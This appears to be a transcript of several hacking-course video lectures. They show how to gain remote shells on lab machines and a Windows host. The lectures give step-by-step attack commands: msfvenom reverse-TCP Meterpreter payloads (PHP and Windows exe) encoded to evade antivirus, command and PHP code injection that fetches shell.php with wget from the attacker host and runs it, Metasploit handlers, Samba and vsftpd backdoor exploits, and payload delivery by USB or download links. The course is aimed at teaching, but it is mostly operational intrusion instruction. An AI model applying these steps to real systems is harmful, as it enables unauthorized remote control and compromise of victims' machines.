Hello everybody and welcome back, and let us actually get started with some of our first exploitations. So what you want to do is open up your MSF console first of all. Next thing that you want to do is basically let us actually open up our OS virtual machine as well. So for me it is already up and running. If it is not for you, you want to open it, and let's go open up our Firefox for a moment. Now what we will be doing in this tutorial is basically I will show you how you can get the Meterpreter shell back with the command injection attack that we already covered before, so you should be already familiar with that. You remember when we pinged that website and we actually managed to connect the target machine back to us. Now we will be doing the same thing, just now, right now we will be getting the Meterpreter shell back. I will also show you how to do the same thing on the PHP injection vulnerability. Now, we didn't cover PHP code injection, but it is simple and it is almost the same as the other injections that we did before. So it is just injecting a certain type of code and injecting it into a browser that isn't very well filtered. So the user input is also read as a code. So let us first of all go to the OS virtual machine. So it is 192.168.1.2. Oops, that 1.2. It will open up our standard OS virtual machine login page, or not login page, the welcome page, where we have all of our stuff we need. And where we want to go, let me just see, we want to go to the BWAP right here. Now, the login is same as before, so B and then bug right here. In order to log in, press enter, and you are logged into this. Now, since I already before removed my burp suite proxy in preferences, you will want to turn it on once again. So let me just go right here. So we will use burp suite as well with the mixture of Metasploit and with the mixture of the OS virtual machine. So just scroll here down. Let me go here on the settings and set my manual proxy configuration. Now if you removed all of these proxy configurations which are basically used for burp suite, please make sure to set them once again and click here OK. And you will be good to go. But right now you will notice that if I reload the page, I will not be able to connect to it. That is why, that is because we are not running the burp suite. So open up another terminal, type here burp suite, press enter, and let's open our proxy. So we'll be able to inspect packets right here, and we will be sending some of the other stuff into the website, such as our Meterpreter shell and such as some of the other commands. So let us just click OK right here. And while this is opening, let us actually check out the page that we will be attacking. So, oh yeah, I forgot, we need to wait for the burp suite to open. So click here next, then start. For us to start the burp suite, oops, we do not want to cancel, so click here no. And we wait for this to open, and then we will go to the page of the PHP code injection, and then after that we will go to the command code injection. Or first of all, let's go to the command code injection, since that is something that you're familiar with and probably will understand it easier. So before we do any of that, just go to the proxy, intercept, and turn the intercept off so we can load the pages properly. Now, when we go to the page and we reload it once again, we successfully connect to it, and here what you want to choose is the OS command injection. As I said before, we should already be familiar with this, so just click on hack right here. We didn't really cover the OS command injection from this page, we covered it from the other page, but it is the same principle. So in the previous attack that we did with command injection, you can remember that we actually pinged a website, and right here we are performing the DNS lookup. So let's see what happens when we just run this with the default server right here. We can see server.server and then this IP address, this one, so this is basically the router. And then we have some of the other options as well. So IP address at the end is this one. It doesn't even matter. So what matters for us is what happens if we run that, and then after that we also specify ls. which is the command to list all of the directories and files in that subdirectory. So we click here ls, and just as simple as that, we can now see that this website is vulnerable to the command injection, since next to our answer that it should actually specify, it also specified all of the files that it has in that directory on its machine, which it shouldn't be specifying. So now that we know that, what we want to do next is basically we want to make a Meterpreter shell that is basically running over PHP. Now, why over PHP? As we can see right here, all of these files are .php, and we can actually upload that shell on this web server and run it and make the web server connect to our virtual machine. So let us do that by first starting off with creating the Meterpreter PHP shell. So this is where we introduce first time the Msfvenom tool, which we will use in order to create the Meterpreter shell. So let's start off with that first. Let us actually, or we can actually leave this. Yeah, I said leave this and then closed it. Doesn't even matter, so we need to leave this, and let's open a new terminal, make it larger, and then zoom in so you can see this better. We will use a simple syntax for the Msfvenom. What we want to do right here is this, so follow me, Msfvenom, and then after that, basically if you want to, you can just type --help. I believe it will print the available options, but let's not bother with this at the moment, just follow with what I'm typing and I will explain while I'm going through it. So Msfvenom, now -p option will actually after that specify the payload that you will use. So we want to use PHP Meterpreter and then reverse TCP. So PHP Meterpreter reverse TCP. Now, in order for you to understand this better, let me actually open Paint, and I will draw a simple drawing of what a reverse TCP shell means. So we have our PC right here, which is the attacker's PC, so it doesn't matter. This is our good old Kali Linux machine. Let's select it as A for the attacker. And here we have the victim machine, which we are attacking, so we want to send the shell to the victim machine. This is, in our case, the OS virtual machine, which we will select with we as a victim. So the problem with connecting, just simply connecting to the open port, is that this machine might have a firewall around it, or not might, basically all of the machines, all of the networks basically nowadays have firewalls. But what firewall cannot prevent is the victim machine connecting back to us. Now, how we will do that? So first of all, the reason why firewall won't prevent it is the same as, for example, imagine if I open my virtual machine right here, Kali Linux, and went to Firefox, and my firewall blocked me from going to google.com. That is a firewall blocking the outgoing connections, which it most likely never does. So let me just continue my drawing right here. What we want to do is we want to send the file to this machine right here. The file, so let's imagine X is that file, and we sent it to the victim machine, and what that file will do is basically it will initiate the connection with us. So this file, when it is run on the victim machine, or when it is started up on the victim machine, it will try to connect to us. So the firewall won't be able to stop it, since the victim machine itself tried to connect to us. And while it tries to connect to us, we will be listening for the outgoing or incoming connections. And once this program is started, it will connect back to us, and we will be able to communicate with this machine and execute commands in it, and so on and so on. But you might be asking, how are we going to get that file on the victim machine? Well, that is simple. If the victim machine is vulnerable to the PHP code injection or to the OS command injection, we will be able to execute it just by making the victim machine download download it with command injection. But if, for example, machine isn't vulnerable to anything, which we will cover in the later videos, when the machine doesn't have any vulnerability, the only way for the victim to download that file is if it clicks on the download button and if it runs it itself. We will not be able to run the file for the victim itself. Or there is another way: if the victim is physically close to you, you can actually take your USB drive, transfer the file onto the USB drive, then transfer to the victim machine while they are not looking or something like that, and then run the file. And basically you just did all of this process by yourself, just being physically on their virtual machine, or on their, on their laptop or on their PC. So I hope you understood this. So the basic idea behind this is that the victim is trying to connect back to us with our malware program or with our PHP Meterpreter shell. So let us continue now with actually making this. Now the name of that shell is Meterpreter. We will use it with the PHP, and we use the reverse TCP connection. Now there are some of the other options as well, but we will use these ones for now. Now, after you specify all of this, the next thing we want to specify is the local host IP address. Now, what is the local host IP address? That is the IP address of the host that's listening, which in this case, the host that is listening is you. So you as an attacker are the listening host. So what we need to specify right here, after the lhost, then equals, and then the IP address. So let me just check what the IP address is from this machine. So I have config, it is .1.7, okay, and then we specify 192.168.1.7, and there after that we need to specify the L port as well, and that is the port that you are listening on. It is also your port. So by default the Metasploit is setting the 4444 port, so we will just keep with that. So just 4444, select that. And after that, you can select some of the other options that are actually optional. So we will select that, so I can just show you. For example, let's use the encoder. Now, the encoder, I covered what encoder is in the previous video. So basically it is used to most likely bypass antiviruses, which actually we do not need in this case, but I will show you how you can use it. So encoder will scramble the code. We will not be able to see the code itself in raw format. We will be seeing scrambled encrypted code. So the encoder that I will use is php/base64. What else we want to specify at the end is -f and then file to be raw, and after that we want to specify this arrow and just save that into reverse shell.php. Or let's just actually name it just shell.php. There is no need for that long name. Once we select all of this and once we double check all of the options that we set, you can click here enter. And this will take a few seconds to finish. It will be around 1000 bytes large or 1100 bytes, something like that if I remember correctly. So, okay, yeah, because of the encoder it is a little bit larger, so our Meterpreter PHP shell is now 1506 bytes large. If you press here ls, you will be able to see it. It is right here. So this is our shell.php, this is our malware, and this is our program that we will be sending to the victim machine. We created it with this command. Now, there are a few things that you need to do when you make the PHP reverse shell. First of all, you need to add the PHP tags, so since it doesn't come with that. So this is the scrambled code. This is basically base64 encoded code. As we can see right here, this is the function that is used to decode the base64. We can see this doesn't look anywhere close to the programming language, but that is why we use the encoder, so it doesn't get detected by antiviruses on legit websites. So what we want to do is add the PHP tags. So first of all, upper, we want to add this tag, then question mark, and then PHP. So that is the opening tag, and at the end we want to add the question mark and then closing tag. You need to add this in order for the program or for the machine to recognize this as the PHP code. So Control O to save, enter, Control X to exit. And now we are good to go. The only thing we need to do right now is set this file or program somewhere where it can be downloaded from. Now that place would be the Apache 2 web server. So you want to send this to your Apache 2 web server. So let us go to var www.html, which is the location of all the programs that are available on your Apache 2 web server, and just type here ls, and let me delete the previous files that we used in the previous tutorials and remove the index.html. And what I want to do is copy, or actually move, root shell.php, or basically whatever path to your shell.php is, and move it to var www.html. And we can see that right now we have this shell.php right here. If we cat it, we can see that this is the PHP shell that we'll be sending to the OS virtual machine. We added the PHP tags, closed PHP tags, and this is the encoded PHP code. So right now the next thing we want to make sure is that the Apache 2 is running. So service Apache 2 status, we can see that it's active and running. And right now what we want to do, go to our IP address, which is 192.168.1.7, I believe, and we can see that right here we have available online the shell.php file. Now what we want to do, we want to make that victim PC actually download this file. So how do we do that? Since it is vulnerable to the command injection, what you want to do is basically, let me just show you right here. What you want to do is use a simple tool that is on all Linux systems, which is called wget. Now wget is basically used to download a file. So let me show you how that looks like on our Linux machine. So let me just close this since we do not need it. And let's actually go to root and make their test and go to test. Here we do not have anything, but if we run this command wget and then we run 192.168.1.7, and we need to specify what are we downloading, so we need to specify the slash and then shell.php, since that is the name of our file that is located in www/html folder. We press here enter, and this will download the file for us. As we can see, it downloaded shell.php just with this simple one command. So if we type here ls once again, we can see that the shell.php is in our folder. If we cat it, you can see, oops, no idea why doesn't it actually contain something. It could be because of that problem with my Apache 2 web server. So what I will do is I will host this real quick on my laptop. So I will create the same file, just give me 1 second, and then it should work. So just 1 second. So I created a file on my laptop, and it should take a few seconds to finish, and I will download the file from there. Now you can continue downloading it from your own Apache 2 web server, since the problem is only with mine. I don't have idea why doesn't it work, but on all the other Kali Linux machines it basically does work, but for some reason here it will not work. So let me just add the PHP tags to my shell on laptop. So what I want to add is this, then question mark, PHP, and then question mark and close tag. And now if we visit the laptop, we should have the same file. So we change this IP address to the IP address of my laptop, and here we have same the shell.php. So let's actually try to now wget 192.168.1.15, and here it downloaded a file. Oops, why is it called index.html? I have no idea. Okay, so we didn't specify, of course, the file itself. What we need to specify is wget 192.168.1.15 and then shell.php. So it actually downloads the correct file. So now, if we cat it, we can see that we get the entire file right here. Now, this was only the problem with the Apache tool from my Kali Linux web server, so don't mind this. You should be good to go. And let's continue with the attack. So right now, what we want to do is perform the command injection. So we know that there is a vulnerable input right here, and let's actually exploit it right now. So we can just delete this and then type here ls once again to see if it still works. We will get all of the files in the current directory since it is vulnerable. And let's right now type the same command. So wget 192.168.1.15 and then shell.php. We saw that it works in our Kali Linux machine, so let's perform this right here. As we can see, it performed it without any error, and right now, if we type here ls once again, let's actually try to find if not right now it successfully downloaded the shell.php, so it should be somewhere around s. So let me just find security. Here it is, shell.php, and we successfully got the shell.php file on our target machine with a simple command, and we didn't have to make anyone click on anything, or we didn't have to make basically any physical contact with that machine. Now, in order for you to execute this file, you will need to type a certain command, but before we type that command, we need to start listening on a certain port. So let us open our MSF console so we can continue with this attack. Right now, before we execute that shell.php on the victim, we want to start our listener in our Metasploit framework. So this is opening. What you want to use right here is something called exploit multi-handler. So this is something that you will use a lot. Just type here use exploit multi and then handler. If you show options, you can see that there are no options right here. So what you want to do is set the payload. Set payload PHP Meterpreter. Let me just Meterpreter reverse. Oops. Let me just see why did it stuck. It got stuck. Okay, so here it is. Reverse TCP. Show options once again, and we can see that we get the L host to listen on. Now double check the port. We specified in that command while we were making shell.php that the L port is 4444 and the L host is the IP address of our own machine. So we listen to our own connection. So set lhost 192.168.1.7. Let me just check if that is really my IP address. Okay, so it is. And all I need to do is type here exploit right now. And this will wait for incoming connection. So right now we are waiting for someone to run that program on the target machine. But since nobody will really do it, we have to do it ourselves. And we can do it since that server is vulnerable to the command injection. So just type here dot and comma, and then what we want to do is basically php minus f and then shell.php. This command right here will run a PHP file. As we can see, if I type here lookup, we get a Meterpreter session 1 opened. We can see right here that it is on a connection from our OS virtual machine, or basically this is a connection from our OS virtual machine, which its IP address is .1.2, and the IP address of this is our Kali Linux machine. So we successfully got Meterpreter open. Now we can check that it really is that machine. If I go right here on ifconfig and type it once again, you can see that it truly is the 192.168.1.2. Now that would be about it for this tutorial. We will cover the other exploits as well, and we will also cover what we can do with the Meterpreter session opened. So what can we execute, what post-exploitation tools can we use, and so on and so on. So that's about it for now. I hope I see you in the next tutorial, and take care. Bye. Hello everybody and welcome back. And now, before we continue to the next tutorial, where I will actually show you some of the exploits that you can run on metasploitable, let me just show you real quick what PHP code injection is. Now, it is very similar to the previous lecture where we covered the OS command injection, but right now let us open the same page. So it is located on the BWAP on our OS virtual machine. Go right here and find the PHP code injection. Once you click on that, click here on hack, and here you have a simple page which basically just says this is just a test page reflecting back your message. So if we just type here message or just click on the message, it will say test. If we click on the message once again, it will once again say test. Now, you might be asking yourself, well, there isn't any input right here which we can input our code. Well, that's true, but if we actually try to intercept this with our burp suite, so open up your burp suite and click here on the intercept on. We want to have the intercept on, and once again, if you click here on the message, it will show us a packet that we send to the web server. Now, it looks very normal until you notice that there is actually a user input right here. So this is not something that you have a form to input on the website, but if you intercept the packet, you can actually input it right here. So what I mean by that, right now, since this is a PHP code injection, we need to use a function, system, and then open up your brackets, and then let's type pwd, which is print working directory. So we just type that right here, so system pwd, that is a function that we will print our working directory, and we forward this packet. You will see that we no longer get the test as a result, but we get the current working directory of that virtual machine, or basically of our OS virtual machine. And just like that, we can now know that the server is vulnerable to the PHP code injection. So what we can do from there, we can actually perform the same type of the attack as we performed in the previous video. So I will show you. If we click on the message once again and intercept the next packet, you can actually just download the shell.php the same way we downloaded from the previous video. So what you would do, but in this case you would do system first and then open up your brackets and then type the same command, so wget 192.168.1.15, or basically here you would specify your own IP address, since if you're running, of course, Apache on your Kali Linux machine, if you're running Apache 2 on some other machine, you would specify the IP address of that other machine that is hosting the Apache 2 with our shell.php file. And you also need to add /shell.php, so it knows which file to download from there, and only what you need to do from there is close the quotes and then close the brackets. Once you do that, you just need to forward this packet, and this basically will, let us just turn the intercept off, and what this will do is it will basically download the shell.php to the target machine, as it did in the previous video. So right now, if I just type here ls once again, and I go right here and then system, open brackets, ls, close quotes, close brackets, and then I forward it, as same in the previous video. Right now, if I go right here, we should be able to find the shell.php file. So here it is right here. We can see that we successfully uploaded the shell.php onto our target web server. And right now, what you would do is basically just click on the message once again, and what you would do is type here system, and then the next thing you would do is basically php, so php -f, and then shell.php. You would close the quotes, close the brackets, and then you would forward this packet as well. Now what this will do, this will basically, so let me just close this, this will basically connect to our own listening machine, which is our Kali Linux machine, and it will prompt us with a Meterpreter shell. Now it won't connect since I didn't really open up my Metasploit framework and didn't specify the L host and L port and that exploit multi-handler that we did in the previous video. So it really won't connect anywhere at the moment, but I just wanted to show you the exact same process that we did in the previous video, just with the PHP code injection. If you want to try to exploit it, you can do what I said with this, but before you run the program itself, with the last command, which was the php-f and then the shell.php, you want to specify this listener in our Metasploit framework. Now, specifying the listener is the same as in the previous video, so I will not be covering that at the moment. Now, in the next video, what I will show you is how you can actually use some of the attacks and exploit Metasploitable. Since I can't really run Metasploitable, I will only show you the process to get to exploit it. I will not be really exploiting it since it doesn't work here. And so I hope you enjoyed this tutorial, and I hope I see you in the next one. Bye! Hello everybody, and welcome back. And in this tutorial right here, I will show you how you can perform two different attacks on the Metasploitable. So just follow my steps. If you have Metasploitable up and running, you should be able to exploit it with these two attacks. So the first one that we will do is attack on Samba. Now I believe that it has the same vulnerability as on the OWASP virtual machine, but I could be wrong, so let me just first of all zoom this in. I will zoom in it twice, and what I will do is I will run my Metasploit framework console. After that we will search for some of the Samba exploits and we will see how we can exploit the Metasploitable virtual machine. So let's wait for this to open. And okay, so we are good to go. Now, right now what we want to do, let's say my OWASP is my Metasploitable, so you run a scan on it. It will finish in a few seconds and you find out their open ports. So the open ports for the Samba, I believe, is something like 445 or 139 or something like that. And then after you find out that which version it is running and on which port is it running, you can search for the exploits that could suit you. So we can see right here that it is running Samba 3.1 or basically 3.x, which is basically any version from 3 to 4, and on 445 port also running the same version. So what we want to do is basically just click here or type here search Samba, and it will list us all of the available exploits for this software. So let me just zoom this out so we can see it a little bit better. And we are not going to use auxiliary anymore. What we will use is the exploit. What we want to use is this one at the moment. So exploit multi-samba usermap _ script. It came out in 2007. It's rating as excellent, and it says right here Samba username max screen command execution. So for example, you could also check out some of the other ones, but let's say the upper one is only working for the versions from 2.2.2 to 2.2.6, so it wouldn't work for our own version. So let's use this one. And I repeat that you need to have the Metasploitable open for this to work. So now that we selected the exploit, let us show our available options right here. You can see that the available options are rhosts and rport. Now, rport is already set as 139, which is correct in my case. Now it can also be 445. If you're running that on both ports, you can actually check that. You can actually check both of them one after another. And what you want to set is set and then the rhosts and then the IP address of your Metasploitable. So I will just do OWASP in my case, it doesn't really matter. After that, what you want to do is actually select the payload that you will use in order to exploit this machine. Now the payload, you can check out your available payloads which show payload option that we covered in the previous videos. It will print out all of the payloads that you can use for this attack. Now, the one that I found working on Metasploitable would be the CMD Unix reverse, which is this one right here. So you can just copy that payload right here. The ranking, they all rank as normal, and this one is Unix command shell double reverse DCP. So what we want to do is set payload and then paste the payload that we are going to use. Once you select that, you want to show options once again. And you will see that the only thing we need to specify in order to get to work, we need to specify the lhost. So lhost is our Kali Linux machine. So just type here your IP address, which in my case is .1.7, I believe. So set lhost 192.168.1.7. And all you have to do after this is basically just type run. This will run on your metasploitable and it should give you a reverse shell in return. Now since I'm scanning on the OWASP, this will not work for me, as it says right here, exploit completed but no session was created, which I pretty much think it means that this virtual machine, which is the OWASP, isn't vulnerable to this attack. But this one should work on your metasploitable. What you will get is basically it won't prompt you anything, but it will basically look like it came out, but once you type ls, it will list all of the files on the metasploitable that are located in that directory. So that is one of the attacks that you want to use against the metasploitable. The other attack is on the FTP port, which is port 21. It is very simple to exploit. You just need to set the rhost and just click exploit. It is on the, I believe that on metasploitable over port FTP, which is port 21, it is running a version VSFTPD 234 or something like that, which is basically vulnerable to this attack. So what you want to do, first of all, you can nmap the metasploitable if you want to and see the port 21 yourself, and after that you use exploit Unix and then FTP and then VSFTPD backdoor. So let me just close this so you can see it better. Click here enter and then show your available options. So show options will show you that the only thing you need to specify is rhosts. So you specify the rhosts 192.168.1.2, which is basically the IP address over your metasploitable, and all you need to do is click run right here. Now I won't be running this since I don't have metasploitable, and on OWASP this service or this version of service, it doesn't exist. Basically port 21 isn't even opened on OWASP. So those are just two attacks that you can try on metasploitable if you want to. You will not encounter it anywhere else. This is just some of the older versions that basically got patched long ago. So these are not some of the real life attacks that you will encounter, but you never know. In the next videos we will try exploiting the Windows machines. So that will be some of the real life attacks that you can actually perform with Payload, with the Meterpreter shell opened. So we will do that in the next tutorial, and I hope I see you there. Bye. Hello everybody and welcome back to the system hacking section. Now in the previous videos we saw how we can actually create some of the exploits for the OWASP virtual machine, and we were able to hack a Linux server with the PHP Meterpreter shell. Now, as we finished with those Tomcat and Apache 2 exploits, now we are going to continue to the Windows exploits. Now this is some of the more important parts, since most of the people use Windows, and since most vulnerable software is actually ran on Windows. So out of all of the other operating systems, Windows is the most vulnerable one. It had in the past a bunch of these vulnerabilities, such as the one I told you before, the Eternal Blue, which we will be doing. It is a vulnerability for the Windows 7 all packs and basically Windows, I believe, Server 2008. And they have some additional Metasploit modules for the Windows 8 and Windows 10, but I couldn't seem to get those to work, so we will be doing the regular Eternal Blue exploit. But before we actually continue with exploiting Windows with Metasploit, let us just install a program that we will need now in this section, and we will also need once we start actually coding our own programs in Python. The program is called Wine. Now, Wine is basically a program for Linux that allows Linux users to actually run Windows programs in Linux. What I mean by that is basically, for example, the executable Windows extension is .exe. Every exe file that you run is basically only executable on Windows. You cannot run it on Linux. So in order for us to run some of the programs that are .exe or .msi, basically we will need to install Wine in order to do that on Linux. Now, there are two reasons why we need it currently. One of them is that Wine is actually required as a program in order to be able to run the Eternal Blue NSA exploit on Windows 7, which is one of the more important exploits that we will do. And the other reason is that we will need Wine in order to make our Python programs in Linux.exe later on when we start coding our own programs. So let us start off by actually downloading it. So I already have it installed. I will show you how to perform that, and we will also install our first Windows program and use it in our Wine program. We will install Python for Windows and use it as a Wine installer. So you will see what I mean soon enough. Let me just enlarge this so you can see a little bit better what I'm doing. So if you just type here Wine in Kali Linux, wine -- help, you should get prompted with this, since I believe Wine is already pre-installed in Kali Linux, but if you ran a 64-bit version of Kali Linux, I believe that you will need to upgrade and add some architecture for the 32-bit. So we also want to install Wine 32-bit. Now I already installed it, and I will show you what is the command in order to perform the installation. So just type in your terminal dpkg, then -- add architecture, and basically what you want is i386 for the 32-bit version. Now this is just one of the three commands that we want to run in order to install, so let us actually run all three at the same time. So let me add these two signs in order to continue with another command, and that will be apt-get update. And the third command which we want to do is apt-get install Wine32. So as we can see, first of all we are adding the architecture for i386, and then we're updating our repositories, and after that we're actually installing the Wine32-bit. Now the apt-get install Wine32-bit won't really work without this command, so we need to run this first. Now since I already ran this before, I will not be running it at the moment since I already have Wine installed. And what you want to do, basically this process, I believe, especially if you didn't update your Kali Linux repositories for longer, will take around 20 to 30 minutes. If you did update your repositories, however, it shouldn't take too long, so you will be good to go. So after you run that, what you want to do is basically let us go to the Python website and actually download the MSA installer for Python 2. So I already did all of that, but I will show you how you can do it, since it is important for future videos. Especially now Python we do not need for the exploit module that we will use in the next videos, but we will need it in our coding section. So start new session, we want to start new one, and what we want to go, just go to your web page and just type here https, then we want to go to the www.python.org. And basically what you want to go is to this link right here, so /downloads/release and then Python-2714, which is the Python 2. Now the reason why we are not using Python 3 is because most of the older programs and older modules and libraries in Python are still supported as Python 2. And for me personally, Python 2 is basically a little easier, since it doesn't include some brackets and all of that, which I always forget to include in Python 3. But I will show you the syntax for both once we get to that. For now on, I just want to show you how you can install this. So once you're on this page, you want to scroll down and you will get this bunch of versions of Python right here, or basically the installer for Python. What you want to do is basically go all the way down to the Windows x86 MSA installer. Once you do that, go click on it. It will ask you, do you want to install Python 2.7.14.msi? The size is 18 megabytes. You want to save that file, and it will save that file right here in your downloads folder. As we can see, if I open my downloads folder, it will show 2 times Python 2.7.14 because I already installed one yesterday, so we can just delete one. Or let me open in terminal and then I will delete Python. It doesn't matter, one of them has to go, or basically it doesn't, so I just want to delete it so I don't have the duplicate. And what you want to do after that is basically you can just, let me just close this, we do not need this browser opened anymore. What you want to do is change your directory to downloads, and if you click here ls you will see your Python file right here, and the next thing you want to do is wine and then msi exec I believe, and then /i and then Python. I believe the syntax looks something like this, we will check it right now. It should work, and after that it should start loading your wine program. Now, since I already did install it, what you want to do is basically just click on next everywhere, and basically you want to install it in the C drive. It will create a virtual C drive for your Kali Linux machine, and once you've finished the installation, just click on finish. I will go on X right here since I already have it. Are you sure you want to cancel the installation? Yes, and then finish. So everything has finished. Now, once you finish the installation, what you want to do is basically navigate to your C drive. Now C drive is something you find in Windows, not in Linux, but for Wine created a virtual C drive with basically Windows modules, libraries and all of that allow us to run Windows executables. So in order to go there you need to go to the root. Then if you click on the root ls you will notice that there is nothing named as Wine. Now Wine basically is a hidden file in this directory, and you can find it in two ways. One of them is basically you can just go find root directory, click on right click I believe, and you can go properties, not really sure if access files change permissions. I thought it would be something like show hidden files, but it doesn't matter. Another way that you can do is just type ls-la, which is command that we covered, so you will see all of the files including hidden files as well. So if you look closely you will see lower that we have a .wine directory, which is a hidden directory, so basically everything that starts with dot will be a hidden file in your directory, and we want to go to that directory, so just type cd .wine, and then if we clear the screen and type ls once again, you will see that we actually have our drive_c directory. So we change our directory to there, we can ls, and right here you will see that we actually have basically all of the Windows files installed. Program files, Windows users, Python 27 is the Python that we installed previously. So this is not currently in need for us, but we will be using, as I said, it later on. So it's good to show you an example of making a Windows file executable on Linux. So now if you, for example, if I change my directory to Python and I ls here, you will see python.exe, which is a Windows executable. In order for you to run it, you would need to type wine python.exe. So you would not be able to run it with basically slash and then basically // and then python.exe. You would need to specify wine before that. So I just wanted to show you that this is just a basic wine installation. What we will do in the next videos is we will start exploiting both Windows 7, Windows 10 and maybe Windows XP, and I will show you how you can craft your own payloads with Msfvenom in more detail, and how you can actually exploit the Windows both with the payload being delivered by you and both without payload even being delivered with zero-day exploits such as Eternal Blue. Well, I mean, they were zero-day exploits, now they are mostly patched, but I'll show you how they work, since a lot of the devices are still vulnerable to that attack. Since it is an attack on Windows 7, most people still do use Windows 7 and most people do not update their Windows. So you will be able to find some of the devices that are still vulnerable to this attack. but more about that in the next videos. I just want to show you this fine installation, and we will continue hacking in the next lecture. Hope I see you there, and take care. Bye. Hello everybody, and welcome back. And let us see some of the examples of actually crafting the payload for Windows Meterpreter shell. So we already were introduced to the Msfvenom tool, which allows us to create our own payloads, but we only did that in the PHP Meterpreter attack, where we executed the Meterpreter shell with the command injection and PHP code injection. But right now, let's see how you can hack any Windows machine with delivering the payload basically over a USB drive, or basically just sending a link to someone for someone to download, and when they execute it, they automatically connect back to you. So this will be an attack that is based on every Windows, and as a target, we will use my Windows 10 host machine. Now, Windows 10 is the newest Windows version, so you will see that it works even on the newest ones, since it is a payload that gets executed by the target, so they have to open it in order for them to connect back to us. So first of all, what we want to do is basically just type here Msfvenom, and we will get a bunch of these options that we need to use in order to specify some of the things that our payload will have. So we were already introduced to some of them, such as lhost, lport, and -p for the payload. As we can see, this is a option that we always specify, so what type of payload we want. And after that we specify some of the payload options, such as localhost, which is the IP address of our Kali Linux machine, and local port, which is the listening port of our Kali Linux machine. Now the IP address is basically the output of ifconfig, and the local port can be any port you specify that isn't actually used. So by default, as I said, the Metasploit chooses the port 4444, so we will stick with that. So let us actually just open up our MSF console for a second to see what are our available payloads. Now in order to craft the payload, you need to know the name of the payload itself. So the most used one is the Windows/Meterpreter/reverse TCP, since it actually connects back to us over TCP and allows us to run our commands over Meterpreter shell. But that is not the only payload that is used for Windows. There are a bunch of others. We will just type here search Windows payloads. So let me just, or we can just type here search payloads, and what we will do, let me just first unzoom this so it looks a little bit prettier. We want to find Windows, wait, these are not payloads, search payloads. Why payload, wait. So let me say, if I type here search payload, okay. Payload, okay, so here they are. Let me just zoom out once again, and we can see all of the payloads for all operating systems. So this is not only for Windows, this is basically also for Linux, or you can see here the PHP as well. Let me just show you, there is the payload that we used in the previous videos. So PHP Meterpreter reverse TCP, so this is the payload that we are already familiar with. But what we want to do now is search payload and then Windows, and then press enter, and so we can only get the Windows payloads right here. Now most of these you will most likely never use. As I said, the most important ones and the ones that we will use right now are these two. So Windows x64-bit Meterpreter reverse TCP. Now that is the Meterpreter payload for the x64 or 64-bit Windows, and we also need the Windows Meterpreter regular shell. So that is the, let me just find it, reverse TCP, here it is. So this is the regular one for the 32-bit Windows. Now you will see that it does matter which one you use, but basically if you use a 32-bit on 64-bit machine, it won't make such a problem unless we are running our Eternal Blue exploit, which I will show you later. But if you just run a simple payload as an executable that target executes, you can both use 64-bit and 32-bit on a 64-bit machine. But you will not be able to run a 64-bit Meterpreter shell on a 32-bit machine. So that is also useful to know. The one that we will use is this one. So let us just copy it, since that is the payload that we will use. And right now, let us exit the MSF console and just let me just zoom it once again so you can see better. And let's type here Msfvenom -- help once again. We want to use this option. The next option that we can possibly use is the encoder, so we can encode our payload if we want to. Basically, it is not necessary. It can actually bypass some antiviruses, but most of the encoders are actually old ones, so they're already familiar. I mean, antiviruses are already familiar with them, so it's not really that good of a use to use them, but we can use them if you want to. So let me just cd to the user share metasploitable modules encoders cd x64. Actually want to go to the cd86, and we can choose any encoder we want. Now, the most important one is the Executable I encoder, but that really basically doesn't do anything since it is already well known by the antivirus companies. First of all, since my Windows 10 machine is actually a 64-bit machine, I will use a 64-bit. So let's see what we have here. We will, for example, use this sudo_dekiru.ruby. So we will use that, but first of all let me show you how it looks like when there is no encoder. So Msfvenom -p for the payload, and we want to use Windows x64 Meterpreter reverse TCP. So if you just select this, it will basically make a simple payload, I believe, with automatically specify L host and L port, or it might actually show you an error that you didn't specify it. So we will specify it just in case. Let me just check out, let me just check out my IP address first, which is the 192.168.1.4. So your IP address is the L host. So let us type here once again. So Msfvenom -p, and then our payload, which I will use 64-bit reverse TCP Meterpreter. Then we specify L host equals 192.168.1.4. Now that we did that, next thing we want to specify is the L port. Now, as I said, by default, Meterpreter or Metasploit uses 4444, but if you want to, you can change this, since some systems can actually block this port, since it is a well-known Metasploit port. So it can be a bypass measure if you simply just change this port, though you do not have to really. We will stick with 4444 for now on, and what you want to type here is -f after that, and then exe, which stands for file, to be the exe file. Then we specify the arrow to the right, and then we name our shell, or reverse shell, or Meterpreter shell, however you want to call it. We will name it reverse.exe. If we click enter right here, it will create a shell for us. Now, what you want to do basically, we will upload this in the next video to the Virus Total, which is a website that is used to scan the programs or your viruses in order to see how many viruses detect this. Now, let us just create this so you can see the size of this. As we can see, the payload size is 510 bytes and the final size of the exe file is 7000 bytes. So if you just type here ls and you cat the reverse.exe, basically it will be some scrambled code. So this is just how to create the simple payload for Windows. In the next lecture I will show you how actually detectable this is, and it is, trust me, a lot detectable. Like 90% of antivirus will catch this, since it is something that everyone that uses Kali Linux made at some point and used, and it is well known in the databases of antiviruses. but we will see what actions we can take in order to make it less detectable using, for example, encoders, or basically just editing the binary itself. But more about that in the next video, so I hope I see you there, and take care. Bye.